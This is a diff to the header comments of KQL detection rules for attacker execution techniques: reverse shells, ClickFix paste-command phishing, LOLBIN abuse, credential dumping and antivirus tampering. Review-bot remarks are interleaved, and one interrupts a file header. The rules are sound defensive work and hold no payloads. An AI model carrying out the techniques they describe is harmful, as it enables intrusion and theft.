-Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
-
+// Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.exfiltration, attack.t1048
 // False Positives:
diff --git a/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql b/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql
index 49d4519c..b50d21a9 100644
--- a/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql
+++ b/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2020-10-10
 // Level: medium
 // Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
+// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127
 // False Positives:
diff --git a/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql b/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql
index ceede2b3..eaa5ea12 100644
--- a/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql
+++ b/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql
@@ -3,8 +3,7 @@
 // Date: 2024-06-26
 // Level: high
 // Description: Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
-The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
-
+// The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.001
 // False Positives:
diff --git a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql
index 3383bd6a..ce73c5e5 100644
--- a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql
+++ b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql
@@ -3,9 +3,8 @@
 // Date: 2025-06-26
 // Level: high
 // Description: Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique,
-where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar.
-The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities.
-
+// where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar.
+// The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1204.004
 // False Positives:
diff --git a/KQL/rules/Execution/forfiles_command_execution.kql b/KQL/rules/Execution/forfiles_command_execution.kql
index 7793cddc..35d2ea1a 100644
--- a/KQL/rules/Execution/forfiles_command_execution.kql
+++ b/KQL/rules/Execution/forfiles_command_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2022-06-14
 // Level: medium
 // Description: Detects the execution of "forfiles" with the "/c" flag.
-While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.
-Can be used to bypass application whitelisting.
-
+// While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.
+// Can be used to bypass application whitelisting.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059
 // False Positives:
diff --git a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql
index 05ba71c1..2d845dfc 100644
--- a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql
+++ b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql
@@ -3,8 +3,7 @@
 // Date: 2022-03-02
 // Level: medium
 // Description: A symbolic link is a type of file that contains a reference to another file.
-This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
-
+// This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059
 // False Positives:
diff --git a/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql b/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql
index 628c8f88..05cd8f75 100644
--- a/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql
+++ b/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2022-10-07
 // Level: high
 // Description: Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.
-Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
-
+// Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.lateral-movement, attack.t1210
diff --git a/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql b/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql
index fb234fca..a28b6a72 100644
--- a/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql
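Review bot: The header of fsutil_behavior_set_symlinkevaluation.kql still never states what the rule detects; after this hunk the Description opens with a definition of a symbolic link and the newly prefixed `// This is probably done ...` line refers to "the ransomware" with no antecedent. A lead sentence that names the monitored activity, mirroring the file name, would make the header self-contained for an analyst triaging the alert, e.g. `// Description: Detects modification of symbolic link evaluation settings via "fsutil behavior set SymlinkEvaluation".` followed by the existing text as continuation lines. The same applies to the `// This is probably done ...` line, which would read better as an explanation of why that change matters rather than a free-floating remark.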
+++ b/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql
@@ -3,7 +3,6 @@
 // Date: 2023-09-05
 // Level: high
 // Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.defense-evasion
diff --git a/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql b/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql
index a2c06cf5..fddb178a 100644
--- a/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql
+++ b/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql
@@ -3,7 +3,6 @@
 // Date: 2024-09-02
 // Level: high
 // Description: Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059
diff --git a/KQL/rules/Execution/installation_of_wsl_kali_linux.kql b/KQL/rules/Execution/installation_of_wsl_kali_linux.kql
index cce61814..a5247255 100644
--- a/KQL/rules/Execution/installation_of_wsl_kali_linux.kql
+++ b/KQL/rules/Execution/installation_of_wsl_kali_linux.kql
@@ -3,8 +3,7 @@
 // Date: 2025-10-10
 // Level: high
 // Description: Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL).
-Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes.
-
+// Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059
 // False Positives:
diff --git a/KQL/rules/Execution/jamf_mdm_execution.kql b/KQL/rules/Execution/jamf_mdm_execution.kql
index ed6614e6..a3a3354c 100644
--- a/KQL/rules/Execution/jamf_mdm_execution.kql
+++ b/KQL/rules/Execution/jamf_mdm_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2023-08-22
 // Level: low
 // Description: Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution
 // False Positives:
diff --git a/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql b/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
index b9b0338a..f592267e 100644
--- a/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
+++ b/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql
@@ -3,8 +3,7 @@
 // Date: 2025-10-18
 // Level: high
 // Description: Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl.
-This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.
-
+// This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.defense-evasion, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql b/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql
index 368b43f0..e4b8f77e 100644
--- a/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql
+++ b/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql
@@ -3,8 +3,7 @@
 // Date: 2025-02-05
 // Level: medium
 // Description: Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt
-to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.
-
+// to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.defense-evasion, attack.t1059.005, attack.t1218.014
 // False Positives:
diff --git a/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql b/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql
index b31ae7fb..92d6c71a 100644
--- a/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql
+++ b/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql
@@ -3,10 +3,9 @@
 // Date: 2025-04-21
 // Level: low
 // Description: Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious.
-Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.
-Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.
-Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.
-
+// Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.
+// Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.
+// Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.007
 // False Positives:
diff --git a/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql b/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql
index ae80ce24..899b5c50 100644
--- a/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql
+++ b/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql
@@ -3,9 +3,8 @@
 // Date: 2021-11-10
 // Level: medium
 // Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses.
-This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.
-This rule will require an initial baseline and tuning that is specific to your organization.
-
+// This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.
+// This rule will require an initial baseline and tuning that is specific to your organization.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1203
 // False Positives:
diff --git a/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql b/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql
index 5676d2ab..80463922 100644
--- a/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql
+++ b/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql
@@ -3,9 +3,8 @@
 // Date: 2024-04-26
 // Level: high
 // Description: Detects outbound network connection initiated by Microsoft Dialer.
-The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.
-This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
-
+// The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.
+// This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.command-and-control, attack.t1071.001
 // False Positives:
diff --git a/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql b/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql
index d9f7fb35..bc0b587e 100644
--- a/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql
+++ b/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2021-11-03
 // Level: medium
 // Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags.
-Attackers can abuse this utility in order to download arbitrary files via a configuration file.
-Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
-
+// Attackers can abuse this utility in order to download arbitrary files via a configuration file.
+// Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
diff --git a/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql b/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql
index 6d4b4137..0c0de02c 100644
--- a/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql
+++ b/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql
@@ -3,9 +3,8 @@
 // Date: 2021-12-20
 // Level: medium
 // Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection.
-This rule looks for the execution of binaries that are named similarly to Sysinternals tools.
-Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection.
-
+// This rule looks for the execution of binaries that are named similarly to Sysinternals tools.
+// Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, attack.t1036.005
diff --git a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql b/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql
index c5fae8b5..faf42fc6 100644
--- a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql
+++ b/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql
@@ -3,10 +3,9 @@
 // Date: 2025-03-25
 // Level: high
 // Description: Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links.
-ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.
-Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,
-such as one-liners that execute remotely hosted malicious files or scripts.
-
+// ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.
+// Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,
+// such as one-liners that execute remotely hosted malicious files or scripts.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1204.001
 // False Positives:
diff --git a/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql b/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql
index e73ec42e..12744408 100644
--- a/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql
+++ b/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql
@@ -3,9 +3,8 @@
 // Date: 2022-01-06
 // Level: medium
 // Description: Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI.
-One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc.
-The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
-
+// One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc.
+// The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
 // MITRE Tactic: Execution
 // Tags: attack.execution, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql b/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql
index 86fe2b90..dac1bc7c 100644
--- a/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql
+++ b/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql
@@ -3,7 +3,6 @@
 // Date: 2024-11-17
 // Level: high
 // Description: Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.defense-evasion, attack.t1036.002
 // False Positives:
diff --git a/KQL/rules/Execution/potential_php_reverse_shell.kql b/KQL/rules/Execution/potential_php_reverse_shell.kql
index db9e6038..72d10fd9 100644
--- a/KQL/rules/Execution/potential_php_reverse_shell.kql
+++ b/KQL/rules/Execution/potential_php_reverse_shell.kql
@@ -3,8 +3,7 @@
 // Date: 2023-04-07
 // Level: high
 // Description: Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
-Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
-
+// Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
 // MITRE Tactic: Execution
 // Tags: attack.execution
diff --git a/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql
index cecef711..d8a9aad1 100644
--- a/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2023-02-14
 // Level: medium
 // Description: Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products.
-Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms.
-This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.
-
+// Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms.
+// This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1047, attack.discovery, attack.t1082
 // False Positives:
diff --git a/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql b/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql
index c95fcd22..52b1b857 100644
--- a/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql
+++ b/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql
@@ -3,7 +3,6 @@
 // Date: 2024-05-27
 // Level: medium
 // Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1204.002
 // False Positives:
diff --git a/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql b/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
index 29371d73..877e0a90 100644
--- a/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
+++ b/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
@@ -3,8 +3,7 @@
 // Date: 2024-11-01
 // Level: high
 // Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
-This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
-
+// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.001
diff --git a/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql b/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql
index 838b3eab..c8b3ebc3 100644
--- a/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql
+++ b/KQL/rules/Execution/powershell_core_dll_loaded_by_non_powershell_process.kql
@@ -3,8 +3,7 @@
 // Date: 2019-11-14
 // Level: medium
 // Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process.
-Detects behavior similar to meterpreter's "load powershell" extension.
-
+// Detects behavior similar to meterpreter's "load powershell" extension.
 // MITRE Tactic: Execution
 // Tags: attack.t1059.001, attack.execution
 // False Positives:
diff --git a/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql b/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql
index 272c80d0..96a353f1 100644
--- a/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql
+++ b/KQL/rules/Execution/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql
@@ -3,10 +3,9 @@
 // Date: 2025-06-05
 // Level: medium
 // Description: Detects the execution of PowerShell commands that attempt to install MSI packages via the
-Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.
-This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.
-And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.
-
+// Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.
+// This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.
+// And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
diff --git a/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql b/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql
index b4a96c2a..62468ada 100644
--- a/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql
+++ b/KQL/rules/Execution/python_reverse_shell_execution_via_pty_and_socket_modules.kql
@@ -3,7 +3,6 @@
 // Date: 2023-04-24
 // Level: high
 // Description: Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution
diff --git a/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql b/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql
index fbb6a34e..bc26a317 100644
--- a/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql
+++ b/KQL/rules/Execution/python_spawning_pretty_tty_via_pty_module.kql
@@ -3,7 +3,6 @@
 // Date: 2022-06-03
 // Level: medium
 // Description: Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059
diff --git a/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql b/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
index da1cace6..49adea19 100644
--- a/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
+++ b/KQL/rules/Execution/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql
@@ -3,10 +3,9 @@
 // Date: 2024-02-08
 // Level: medium
 // Description: Detects the execution of an AnyDesk binary with a version prior to 8.0.8.
-Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.
-Use this rule to detect instances of older versions of Anydesk using the compromised certificate
-This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
-
+// Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.
+// Use this rule to detect instances of older versions of Anydesk using the compromised certificate
+// This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.initial-access
 // False Positives:
diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql b/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql
index 10e57e1f..88143191 100644
--- a/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql
+++ b/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql
@@ -3,8 +3,7 @@
 // Date: 2023-10-10
 // Level: low
 // Description: Detects the creation of files in a specific location by ScreenConnect RMM.
-ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.
-
+// ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059.003
 // False Positives:
diff --git a/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql
index 7067667c..15bca231 100644
--- a/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql
+++ b/KQL/rules/Execution/service_reconnaissance_via_wmic_exe.kql
@@ -3,10 +3,9 @@
 // Date: 2023-02-14
 // Level: medium
 // Description: An adversary might use WMI to check if a certain remote service is running on a remote device.
-When the test completes, a service information will be displayed on the screen if it exists.
-A common feedback message is that "No instance(s) Available" if the service queried is not running.
-A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
-
+// When the test completes, a service information will be displayed on the screen if it exists.
+// A common feedback message is that "No instance(s) Available" if the service queried is not running.
+// A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1047
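Review bot: The path quoted on the new line `+// ... will be dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution.` has no drive letter before the colon and a doubled backslash where a user-name component would sit, which looks like a wildcard or placeholder lost during conversion rather than the intended location; as written the comment no longer tells an analyst where to look. If that reading is right, the line should spell the missing parts out as placeholders, e.g. `// ... will be dropped to "<drive>:\Users\<user>\Documents\ConnectWiseControl\Temp\" before execution.` The query body of this rule is outside the hunk, so it is worth checking whether its path filter was mangled the same way, since a lost wildcard there would stop the rule matching at all.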
diff --git a/KQL/rules/Execution/shell_execution_via_git_linux.kql b/KQL/rules/Execution/shell_execution_via_git_linux.kql
index fb6507ce..fe7759bb 100644
--- a/KQL/rules/Execution/shell_execution_via_git_linux.kql
+++ b/KQL/rules/Execution/shell_execution_via_git_linux.kql
@@ -3,7 +3,6 @@
 // Date: 2024-09-02
 // Level: high
 // Description: Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059
diff --git a/KQL/rules/Execution/shell_execution_via_rsync_linux.kql b/KQL/rules/Execution/shell_execution_via_rsync_linux.kql
index 2505dcd6..aee469f9 100644
--- a/KQL/rules/Execution/shell_execution_via_rsync_linux.kql
+++ b/KQL/rules/Execution/shell_execution_via_rsync_linux.kql
@@ -3,7 +3,6 @@
 // Date: 2024-09-02
 // Level: high
 // Description: Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059
 // False Positives:
diff --git a/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql b/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql
index 6a45c72d..d7349c88 100644
--- a/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql
+++ b/KQL/rules/Execution/shell_invocation_via_env_command_linux.kql
@@ -3,7 +3,6 @@
 // Date: 2024-09-02
 // Level: high
 // Description: Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059
 // False Positives:
diff --git a/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql b/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql
index 3a434d12..885ca822 100644
--- a/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql
+++ b/KQL/rules/Execution/shell_invocation_via_ssh_linux.kql
@@ -3,7 +3,6 @@
 // Date: 2024-08-29
 // Level: high
 // Description: Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.t1059
